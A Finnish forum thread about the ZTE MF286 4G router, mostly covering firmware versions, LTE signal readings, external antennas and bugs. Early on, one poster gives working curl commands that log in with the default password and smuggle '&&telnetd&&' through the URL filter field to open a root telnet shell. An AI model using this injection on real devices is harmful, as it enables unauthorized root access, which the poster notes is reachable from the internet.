ZTE MF286 -kokemuksia

DNA Kotimokkula 4G+ WLAN MF286 Uusi versio on: ZTE_DNA_MF286_B04
1. Korjattu DHCP käyttäytyminen siltaavassa tilassa (helpottaa kolmannen osapuolen reitittimen käyttämistä)
=> Miten uudella B04 firmware:ssa oleva siltaava tila toimii, jos on kolmannen osapuolen reitittimessä DHCP käytössä?
 
DNA Kotimokkula 4G+ WLAN MF286 Uusi versio on: ZTE_DNA_MF286_B04
1. Korjattu DHCP käyttäytyminen siltaavassa tilassa (helpottaa kolmannen osapuolen reitittimen käyttämistä)
=> Miten uudella B04 firmware:ssa oleva siltaava tila toimii, jos on kolmannen osapuolen reitittimessä DHCP käytössä?
Portissa 1/wan mikälie olikaan ei nyt tuntuisi olevan dhcp:tä bridgessä. Muissa porteissa ja wlanissa on.
 
Tässä laitteessa on muuten vähemmän yllättäen valmistajan tekemä backdoor. Tätä ei kuitenkaan pysty hyödyntämään koska sen verran ovat panostaneet että tarvitsee laitekohtaisen salasanan joka on IMEI koodi kryptattuna salausavaimella joka ei tiedossa.

Samainen backdoor on kuitenkin mahdollista aktivoida myös toista kautta hyödyntämällä bugia laitteen webisuodatuksessa. Ohessa curl komennot joilla ensin tunnistaudutaan hallintaan oletussalasanalla (MIME encoodattu "1234") ja sen jälkeen lisätään suodatuskäsky joka suodattaa olemattoman osoitteen sekä käynnistää siinä ohessa telnetd:n.

Koodi:
curl "http://192.168.1.1/goform/goform_set_cmd_process" -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" -H "Referer: http://192.168.1.1/index.html" --data "isTest=false&goformId=LOGIN&password=MTIzNA%3D%3D"

curl "http://192.168.1.1/goform/goform_set_cmd_process" -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" -H "Referer: http://192.168.1.1/index.html" --data "isTest=false&goformId=URL_FILTER_ADD&addURLFilter=http%3A%2F%2F_L33T_H4X0R_%2F%26%26telnetd%26%26"

Tämä telnetd kuuntelee portissa 4719. Käyttäjätunnus on "admin" ja salasana "admin".

HUOM! Portin 4719 telnet palvelin vastaa myös Internetistä tuleviin yhteydenottoihin sekä IPv4 että IPv6 osoittein! Älä siis tee tätä silloin kun mobiilidata on päällä.

DATAPUISTOKEMISTI: Backdoor and root shell on ZTE MF286


Itselläni on tästä se DNA brändätty versio. Jos joku jolla Elisan versio uskaltautuu kokeilemaan ylläolevia loitsuja ja pääsee roottina laitteeseen auttaisi paljon tietää Elisa version tarkat versionumerot. Versionumerot näkee nvrammista "nv show | grep _version" komennolla. Koko nvram dumppi Elisan laitteesta (nv show) olisi toki myös hyödyllinen jotta näkisi onko DNA versiosta puuttuvat ominaisuudet piilotettu nvram muuttujilla vai jotain muuta kautta. Tästä näkyy kuitenkin myös laitteen salasanat ja salausavaimet eli ei kannata sellaisenaan pasteilla sitä kokonaisena ympäriinsä.

Käpälöimällä roottina integrate_version nvram muuttujan arvoa sisäänrakennettu autoupdater alkaa etsiä eri version firmiksiä. Tässä pitää kuitenkin huomioida että päivitykset ovat aina edellisen version päälle asennettavia. Jos siis DNA version päälle pakottaa jonkin muun version on lopputuloksena sekoitus DNA:ta ja sitä toista operaattoria - joskin oletusten palautus reset näppäimellä saattaa riittää korjaamaan tämän. Itse firmware image näyttää olevan ZIP jossa sisällä shell scripti nvram asetusten muutteluun sekä flashiin kirjoitettava LZMA pakattu image.

Koodi:
~ # nv show | grep _version
cr_inner_version=CR_DNAMF286V1.0.0B05
wa_version=BD_DNAMF286MODULEV1.0.0B02
dm_new_version=No Name
cr_version=ZTE_DNA_MF286_B02
wa_inner_version=BD_DNAMF286MODV1.0.0B02
hardware_version=MF286-1.0
integrate_release_version=EN_DNA_FI_MF286V1.0.0B05
detect_new_version=0
redirect_conf=ppp_status=ppp_disconnected;detect_new_version=1;detect_new_message=1;
ota_new_version_state=version_idle
integrate_version=EN_DNA_FI_MF286V1.0.0B05
 
Backdoor.. Ja toki heti kun sain aikaiseksi itsellenikin hommata tuon kyseisen purkin. Noh.. tuskin on kuitenkaan ihan ensimmäinen purkki josta tämä "ominaisuus" löytyy.
Ellen väärin ymmärtänyt niin ollaan siis vielä "turvassa" vielä salasanan takana. Ja parempi olla jakamatta imeitä myöskään kun ei tiedetä missä se salausavain menee.
Tavallisen käyttäjän tuskin tarvinnee olla liian huolissaan. Oletan. En ole asiantuntija. :)

Url filtterissä näkyy olevan 32 merkin raja. Huomasin äsken.
 
Tuo ei tosiaan tarkoita, että oltaisiin ulkopuolisen uhan alla. Eli nuo komennot pitää ensin päästä ajamaan lähiverkosta, että laite aukeaa netin suuntaan. Onko tuo sitten edes backdoor vai vain loppukäyttäjälle dokumentoimaton debug-ominaisuus. On reititinsoftia joissa on avoimesti annettu mahdollisuus avata telnet yms ulospäin. Tuo url-filtteri on kyllä bugi, mutta yksistään ei vielä vaarallinen.
 
Oletan että image oli vielä kryptattu jollain ?

Ihan vaan ZIP jonka sisällä moneen kertaan LZMA pakattuna firmware. Tuo tosiaan taitaa olla incremental eli sisältää vain mitä muuttunut edellisestä versiosta. Laite käyttää päivitysten latailuun kolmannen osapuolen kaupallista softakikkaretta joka tulee binäärinä ZTE:lle. Tuossa suora linkki firmware updateen DNA B02 -> B04. Sisäinen versionumerointi ei käytä samoja numeroita, sen takia tuossa lukee B03 -> B05. http://dl1.ztems.com:80/zxmdmp/down...FI_MF286V1.0.0B03-EN_DNA_FI_MF286V1.0.0B05.up


Tuo ei tosiaan tarkoita, että oltaisiin ulkopuolisen uhan alla. Eli nuo komennot pitää ensin päästä ajamaan lähiverkosta, että laite aukeaa netin suuntaan. Onko tuo sitten edes backdoor vai vain loppukäyttäjälle dokumentoimaton debug-ominaisuus. On reititinsoftia joissa on avoimesti annettu mahdollisuus avata telnet yms ulospäin. Tuo url-filtteri on kyllä bugi, mutta yksistään ei vielä vaarallinen.

Juuri näin. Valitettavasti tämä ZTE ei ole poikkeus vaan saman verran näitä takaovia ja tietoturvamokia on muissakin kiinalaisten virittelemissä reitittimissä ja tukiasemissa.
 
Meidänkin peräkylille oli eksynyt 1800mhz verkko 800mhz:n kaveriksi. Nythän ZTE arpoo verkonvalintaa klikkailemalla tuon yhdessä toimimaan mutta jostain syystä jonkun ajan kulttua on valinnut itseensä pelkän 800mhz:n jossa on parempi signaali kyllä mutta huomattavasti hitaampi. Kokeilin tuota Asiantuntijakaverin koodilukitustakin. Komento menee perille mutta taas jonkun ajan päästä purkki kiinni pelkässä B20 taajuudessa ja nopeudet on mitä on. Kohtalaisen ärsyttävä tuota aina manuaalisesti arpoa oikeille taajuuksille.
 
Mikähän suuntaava ulkoantenni sopisi tähän malliin? Kaikki SMA-liitäntäiset? Suosituksia?
 
Meidänkin peräkylille oli eksynyt 1800mhz verkko 800mhz:n kaveriksi. Nythän ZTE arpoo verkonvalintaa klikkailemalla tuon yhdessä toimimaan mutta jostain syystä jonkun ajan kulttua on valinnut itseensä pelkän 800mhz:n jossa on parempi signaali kyllä mutta huomattavasti hitaampi. Kokeilin tuota Asiantuntijakaverin koodilukitustakin. Komento menee perille mutta taas jonkun ajan päästä purkki kiinni pelkässä B20 taajuudessa ja nopeudet on mitä on. Kohtalaisen ärsyttävä tuota aina manuaalisesti arpoa oikeille taajuuksille.

Minkälaisia signaali dBm ja SINR arvoja antaa 800Mhz ja 1800Mhz LTE taajuuksilla, kun arpoo verkkoa?
 
Minkälaisia signaali dBm ja SINR arvoja antaa 800Mhz ja 1800Mhz LTE taajuuksilla, kun arpoo verkkoa?
B20:
RSRP 92, SNR 10, RSSI 65 mutta tämä ei muutu. Nopeudet keskiarvolla 10/2 Mbps.
B20+B3:
RSRP 100, SNR 20, RSSI 73 ja tämä taas ei muutu. Nopeudet keskiarvolla 40/20 Mbps.
 
B20:
RSRP 92, SNR 10, RSSI 65 mutta tämä ei muutu. Nopeudet keskiarvolla 10/2 Mbps.
B20+B3:
RSRP 100, SNR 20, RSSI 73 ja tämä taas ei muutu. Nopeudet keskiarvolla 40/20 Mbps.

Tärkeimpinä arvoina nuo SINR=SNR ja RSRQ arvot jotka vaikuttavat eniten datanopeuteen eli signaalin laatu on voimakkuutta RSRP tärkeämpi ominaisuus. Lisäksi vastaan tulee yleensä vain 3G ja GSM puolella olevana on RSSI joka siis mittaa koko kaistanleveyden signaalitasoa. Tämä ei siis suoraan ole sama kuin RSRP.
 
Saako jollain windows ohjelmalla nuo SINR=SNR arvot näkyviin tuosta ZTE MF286 purkista?
 
Taitaa johtua linkin toimimattomuus dropboxin hiljattain muuttuneista käytännöistä public folderin suhteen.

Ping @FLC saadaanko toimiva linkki, kiitos.

Jos ei tule iltaan mennessä niin voin toki uppia tuon itsekin kun kotiudun. :)
 
Minulla ainoa ZTE MF286 Info, joka on toiminut on v0.6.182 (otsikkopalkissa v0.6.161).
Sekin ilmoitti alussa pilkkuvirhettä, kun olin jättänyt W10 asetuksissa desimaalierottimeksi USA-vaihtoehdon.
Kyseessä siis Elisan myymä ZTE_MF286_B02
 
Minulla ainoa ZTE MF286 Info, joka on toiminut on v0.6.182 (otsikkopalkissa v0.6.161).
Sekin ilmoitti alussa pilkkuvirhettä, kun olin jättänyt W10 asetuksissa desimaalierottimeksi USA-vaihtoehdon.
Kyseessä siis Elisan myymä ZTE_MF286_B02
ourasi. Kiitos tuosta ideasta vaihtaa kielet suomeen. Loppu Linux Mintissä errorit infokikkareessa.
 
Taitaa laitteet mitata eri arvoja. RSSI kuvastaa enemmän kaikkea k.o. taajuusalueella vastaanotettavaa signaalikononaisuutta, ja ZTE kertoma on RSRP, eli yhdistetystä tukarista saatu signaalin voimakkuus. Tosin ei ihan näin suoraan, mutta jokseenkin näin.

Itsekin olen huomannut tämän olevan hitaampi, kuin muut käyttämäni laitteet. Esim. Huawei E5186 saa 120/15Mbps , tämä vain 70/10Mbps. Samat ulkoiset antennit. En tiedä, mistä johtuu...

Toimiiko ZTE MF286 ulkoantennin liitännät?

Testasin kumpaakin antenniliitäntää erikseen ja ole tullut siihen tulokseen, että minun modeemissa ei toimi vasen liitäntä olenkaan (takaa katsottuna). Verokkina TW-LTE/4G/3G+ modeemi mokkulaan kahdella ulkoisella antennilla Iskra P-56 unicom kytkettynä. TW-LTE:n vaikutta jos on vain yksi antenni kiinni. Kumpikin antenni vaihdettu ristiin ja singaalin voimakuus muuttuu ja siirtonopeus. MF286 vaikutus ainoastaan oikeassa liittimessä (takaa katsottuna) havaintoja.
 
Testasin kumpaakin antenniliitäntää erikseen ja ole tullut siihen tulokseen, että minun modeemissa ei toimi vasen liitäntä olenkaan (takaa katsottuna).

Se lienee diversiteetti-liitäntä jonka ei pitäisikään vaikuttaa? Kyllähän tässäkin ketjussa taitaa olla useampi henkilö jolla se "ei toimi", minä mukaanlukien. En kyllä tolla Poyntingin ristiantennilla mitään vaikutusta huomannut toinen piuha irti ja päällä, tosin mastokin on aika vieressä.
 
Itsellä hetken toimii ulkoinen antenni (Joku kiinaihme) mutta vaihtelevan ajan päästä purkki on antennin hukannut. Olen useammalla antennilla kokeillut ja aina sama juttu. Myöskään Asiantuntijakaverin laittamat taajuuslukkokomennot ei tuntuis toimivan ulkoisen antennin kanssa. Ainoastaan ilman niitä saa lukittua miten haluaa. Tiedä sitten onko sillä merkitystä että oma purkki ei ole DNA brändätty.
 
Uudella (vaihdettu takuuseen) ZTE MF286 laitteella ja vanhat ulkoantennin Iskra P-56 unicom kytkettynä.

TW-LTE/4G/3G+ (CAT3 1800) vs ZTE MF286 (CAT6 1800/800) arvot:
RSRP (dbm) -67 / -103
SNR (SINR) ? /-20,6
Dl (Mbps) 94,50 / 58,90
Ul (Mbps) 16,21 / 11,24

Miksi ZTE RSRP -103dbm arvo on noin huono verrattuna TW-LTE -67dbm?
Onko ZTE MF286 signaalin käsittely oikein rakennettu?
(Ulkoantennit ja liitokset todettu toimiviksi.)
Yhteen veto Kiina DNA ihmeestä ☹
Onko muilla samanlaisia kokemuksia?
ZTE MF286 2017-04-08.jpg TW-LTE 4G Modemi 2017-04-08.jpg
 
Viimeksi muokattu:
Nyt näin kahden kuukauden jälkeen alkoi laite pudottaa verkkoa pois päältä usean kerran päivässä. Factory resetkään ei auta asiaa. Jos nyt yhtään muistan niin muillakin on ko. ongelmaa ollut täällä? Onko tämä nyt huoltokamaa vai mitä? Firmwaren päivitys?
 
Uudella (vaihdettu takuuseen) ZTE MF286 laitteella ja vanhat ulkoantennin Iskra P-56 unicom kytkettynä.

TW-LTE/4G/3G+ (CAT3 1800) vs ZTE MF286 (CAT6 1800/800) arvot:
RSRP (dbm) -67 / -103
SNR (SINR) ? /-20,6
Dl (Mbps) 94,50 / 58,90
Ul (Mbps) 16,21 / 11,24

Miksi ZTE RSRP -103dbm arvo on noin huono verrattuna TW-LTE -67dbm?
Onko ZTE MF286 signaalin käsittely oikein rakennettu?
(Ulkoantennit ja liitokset todettu toimiviksi.)
Yhteen veto Kiina DNA ihmeestä ☹
Onko muilla samanlaisia kokemuksia?
Sanoisin, että Telewell mittaa RSSI -arvoa ja tämä ZTE tosiaan RSRP:tä. RSRP on tärkeämpi arvo.

Olen myös itse havainnut, että ZTE signaalinkäsittely on jotenkin heikompaa kuin monessa muussa laittessa. En muuta syytä ole sille keksinyt, että nopeudet ovat ainakin myös minulla ZTE:llä järjestäen hitaampia (signaali noin -100 RSRP, mutta laatu erinoimainen (SINR 20).
 
RSRP:tä ulkoisilla antenneilla(esim.masto) saa yleensä parannettua nostamalla antennia ylöspäin.
 
Koitin tuota DNA brändättyä saada tuohon 700MHz:n kiinni näillä curleilla jota tässä ylempää mainittiin, ja successia kertoi, mutta ZTE info ilmoittaa edelleen 800MHz verkon olevan käytössä, jos taas koitan 1800MHz verkkoa niin yhteys putoaa samantien (täällä ei kuulu laisinkaan se).
Saisivat DNA:lla puskea sen 700MHz päivitysen tähän jo.


PS. Ei kukaan sattuis tietämään mitä cellmapperissa tarkoittaa tuo * kun on esim. "Bands 20*"?
 
Koitin tuota DNA brändättyä saada tuohon 700MHz:n kiinni näillä curleilla jota tässä ylempää mainittiin, ja successia kertoi, mutta ZTE info ilmoittaa edelleen 800MHz verkon olevan käytössä, jos taas koitan 1800MHz verkkoa niin yhteys putoaa samantien (täällä ei kuulu laisinkaan se).
Saisivat DNA:lla puskea sen 700MHz päivitysen tähän jo.


PS. Ei kukaan sattuis tietämään mitä cellmapperissa tarkoittaa tuo * kun on esim. "Bands 20*"?

* tarkoittaa Estimated, eli se on taajuus se tulee laskettuna CellMapper järjestelmästä. Jos siinä ei ole tota * niin tarkoittaa että se on tieto tullut puhelimesta. Estimated on yleensä täysin oikea, enpä ole törmännyt että olisi virheelline ollut kuin että jos on noita virheellisiä tukiasemia.
 
mitähän tässä lähtisi tekemään kun zte + verkkiksen 5m kaapelilla olevalla paneeliantenilla saan soneran mastoon

keskiarvoina
RSRP 85
SNR 12-14
RSSI 59
RSRQ 6

nopeudet on päivällä dl 20-30 ja ul aina 30 pintaan.

Rupeaako tuohon paneelin ympärille kyhäämään kanaverkkoa vai millä tuota saisi paremmaksi. Yöllä noilla lukemilla kyllä saa DL 50-60 ja UL 30.

yllä olevat telian 1800 mastoon lukittu signaali. Elisan liittymällä saan samasta suunnasta LTE-A / CA yhteyden 1800/800 mutta sillä SINR arvo pyörii 5-10 välissä mutta latausnopeudet samaa ja yöllä myös tuota nopeampaa.

etäisyys mastoon 2-3km.

sain myös telian 2600 verkkoon ympärisäteilevällä antennilla (pupun korvat) mutta silloin yhteys tökki pahasti koska kartan mukaan se ei yletä tänne asti.
 
paljonkohan mahtaa vaikuttaa Speedtest tuloksiin ? tuo että ainakin DNA firmiksellä MTU on 1392 ..samassa paikassa E3372 antaa parempia nopeuksia --.
 
Onko kaikkien myyjien boksit lukitsemattoamia? Jos on, niin kenen parhain?

Itse ottaisin elisalta jos sattuu samaan rahaan irtoamaan kun muilta. Taitavat olla ainoita jotka antavat akun mukaan. DNA:n firmiksellä olevaan boksiin on tullut muutenkin joskus 2016 vissiin edellinen päivitys. Ei kyllä käryä siitä onko elisa yhtään sen nopeampi päivittelemään.
 
Itse ottaisin elisalta jos sattuu samaan rahaan irtoamaan kun muilta. Taitavat olla ainoita jotka antavat akun mukaan. DNA:n firmiksellä olevaan boksiin on tullut muutenkin joskus 2016 vissiin edellinen päivitys. Ei kyllä käryä siitä onko elisa yhtään sen nopeampi päivittelemään.

Mulla Telian kortti. Ilmeisesti toimii myös Elisan mallissa?
 
Itse ottaisin elisalta jos sattuu samaan rahaan irtoamaan kun muilta. Taitavat olla ainoita jotka antavat akun mukaan. DNA:n firmiksellä olevaan boksiin on tullut muutenkin joskus 2016 vissiin edellinen päivitys. Ei kyllä käryä siitä onko elisa yhtään sen nopeampi päivittelemään.
Jos olen kärryillä tämän ketjun tapahtumien perusteella, niin elisassa on dna:ta vanhempi firmis.
 
Jos olen kärryillä tämän ketjun tapahtumien perusteella, niin elisassa on dna:ta vanhempi firmis.
Vanhempi firmis on Elisalla juu. Ja esim. signaalitiedot suoraan hallinnassa huonommat vielä. Toivottavasti Elisa päivittelee purkkejaan eikä tästä tule samanlainen murheenkryyni kun Huawei B593 oli ja se odottelee vieläkin taajuuslukkoa vaikka se muiden operaattoreiden purkeista löytyykin. DNA:lta luvattu jo uutta päivitystä ZTE:hen. Elisasta ei ole tietoa. Hiukan harmittaa että Verkkiksen huollossa DNA purkki muuttui Elisan purkiksi vaikka tässä tämä akku onkin.
 
Lupailivat loppukeväällä/alkukesästä uutta pätsiä... jospa korjaisivat mm. USB portin bugisuuden (ei tueta).
 
Yksi mahdollisesti bugi minkä itse olen huomannut on se että jos purkissa olevaan SIM korttiin tulee tekstiviesti niin ainakaan selaimella ei pääse mihinkään ennenkun viesti on luettu. Näin ainakin DNA versiossa.

Edit: Jäi mainitsematta että en ole laiskuuttani jaksanut etsiä paikkaa mihin tuon mahdollisen bugin voisin ilmoittaa.
 
Yksi mahdollisesti bugi minkä itse olen huomannut on se että jos purkissa olevaan SIM korttiin tulee tekstiviesti niin ainakaan selaimella ei pääse mihinkään ennenkun viesti on luettu. Näin ainakin DNA versiossa.

Kuulosti niin hullulta väitteeltä, että oli pakko kokeilla. Totta puhuit!
 
Yksi mahdollisesti bugi minkä itse olen huomannut on se että jos purkissa olevaan SIM korttiin tulee tekstiviesti niin ainakaan selaimella ei pääse mihinkään ennenkun viesti on luettu. Näin ainakin DNA versiossa.

Edit: Jäi mainitsematta että en ole laiskuuttani jaksanut etsiä paikkaa mihin tuon mahdollisen bugin voisin ilmoittaa.
Avaa vaikka keskusteluketju tänne: Nettiyhteydet - tuki.dna.fi - DNA ei tarvitse leikkiä first level aspan jekkujen kanssa ja selittää puhelimessa asiaa miljoonaa kertaa uudelleen, kun eivät ymmärrä laitteista mitään.

Kerran yrittivät saada minut soittamaan Cityworksille, kun kysyin, tukeeko laite B28 700MHz, ja onko sitä tulossa valikkoon lukittavaksi... kuulemma ei DNA vastaa myymistään tuotteista ja osaa kertoa, mitä laitteet tukevat. Hieman painostaen suostuivat tuon selvittämään. Kuulemma B28 lukko on tulossa valikkoon...
 

Statistiikka

Viestiketjuista
262 353
Viestejä
4 548 045
Jäsenet
74 976
Uusin jäsen
Pezgi

Hinta.fi

Back
Ylös Bottom